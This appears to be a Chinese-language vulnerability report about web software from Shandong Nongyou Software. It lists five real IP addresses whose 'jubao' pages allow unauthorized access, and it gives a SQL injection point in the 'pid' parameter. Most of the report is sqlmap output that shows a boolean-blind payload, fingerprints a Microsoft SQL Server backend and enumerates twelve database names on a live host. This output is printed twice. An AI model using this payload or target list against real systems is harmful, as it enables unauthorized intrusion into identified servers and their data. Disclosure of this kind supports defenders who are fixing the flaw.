### 简要描述:
RT
### 详细说明:
山东农友软件公司官网:http://www.nongyou.com.cn/
越权案例如下:
http://221.2.149.47:8100/jubao/left.aspx
http://222.135.109.70:8100/jubao/left.aspx
http://123.134.189.60:8012/jubao/left.aspx
http://218.56.40.229:8020/jubao/left.aspx
http://222.135.127.190:7000/jubao/left.aspx
[<img src="https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png)
2.一处越权注入:
http://222.135.127.190:7000/jubao/StatisticalAnalysisChart.aspx?pid=
http://221.2.149.47:8100/jubao/StatisticalAnalysisChart.aspx?pid=
http://222.135.109.70:8100/jubao/StatisticalAnalysisChart.aspx?pid=
http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=
http://218.56.40.229:8020/jubao/StatisticalAnalysisChart.aspx?pid=
2.测试注入点:http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=
[<img src="https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png)
```
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz
---
[18:13:11] [INFO] testing MySQL
[18:13:11] [WARNING] the back-end DBMS is not MySQL
[18:13:11] [INFO] testing Oracle
sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you
want to follow? [Y/n] n
[18:13:12] [WARNING] the back-end DBMS is not Oracle
[18:13:12] [INFO] testing PostgreSQL
[18:13:12] [WARNING] the back-end DBMS is not PostgreSQL
[18:13:12] [INFO] testing Microsoft SQL Server
[18:13:12] [WARNING] reflective value(s) found and filtering out
[18:13:12] [INFO] confirming Microsoft SQL Server
[18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[18:13:13] [INFO] fetching database names
[18:13:13] [INFO] fetching number of databases
[18:13:13] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[18:13:13] [INFO] retrieved: 12
[18:13:14] [INFO] retrieved: gangchengnl
[18:13:22] [INFO] retrieved: gaoxinqunl
[18:13:31] [INFO] retrieved: kaifaqunl
[18:13:41] [INFO] retrieved: laichengnl
[18:13:51] [INFO] retrieved: laiwunl
[18:13:58] [INFO] retrieved: master
[18:14:03] [INFO] retrieved: model
[18:14:08] [INFO] retrieved: msdb
[18:14:11] [INFO] retrieved: ReportServer
[18:14:21] [INFO] retrieved: ReportServerTempDB
[18:14:36] [INFO] retrieved: tempdb
[18:14:41] [INFO] retrieved: xueyenl
available databases [12]:
[*] gangchengnl
[*] gaoxinqunl
[*] kaifaqunl
[*] laichengnl
[*] laiwunl
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xueyenl
[18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\123.134.189.60'
```
均可复现。
### 漏洞证明:
2.测试注入点:http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=
[<img src="https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png)
```
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz
---
[18:13:11] [INFO] testing MySQL
[18:13:11] [WARNING] the back-end DBMS is not MySQL
[18:13:11] [INFO] testing Oracle
sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you
want to follow? [Y/n] n
[18:13:12] [WARNING] the back-end DBMS is not Oracle
[18:13:12] [INFO] testing PostgreSQL
[18:13:12] [WARNING] the back-end DBMS is not PostgreSQL
[18:13:12] [INFO] testing Microsoft SQL Server
[18:13:12] [WARNING] reflective value(s) found and filtering out
[18:13:12] [INFO] confirming Microsoft SQL Server
[18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[18:13:13] [INFO] fetching database names
[18:13:13] [INFO] fetching number of databases
[18:13:13] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[18:13:13] [INFO] retrieved: 12
[18:13:14] [INFO] retrieved: gangchengnl
[18:13:22] [INFO] retrieved: gaoxinqunl
[18:13:31] [INFO] retrieved: kaifaqunl
[18:13:41] [INFO] retrieved: laichengnl
[18:13:51] [INFO] retrieved: laiwunl
[18:13:58] [INFO] retrieved: master
[18:14:03] [INFO] retrieved: model
[18:14:08] [INFO] retrieved: msdb
[18:14:11] [INFO] retrieved: ReportServer
[18:14:21] [INFO] retrieved: ReportServerTempDB
[18:14:36] [INFO] retrieved: tempdb
[18:14:41] [INFO] retrieved: xueyenl
available databases [12]:
[*] gangchengnl
[*] gaoxinqunl
[*] kaifaqunl
[*] laichengnl
[*] laiwunl
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xueyenl
[18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\123.134.189.60'
```
[<img src="https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png)
京公网安备 11010502034610号
暂无评论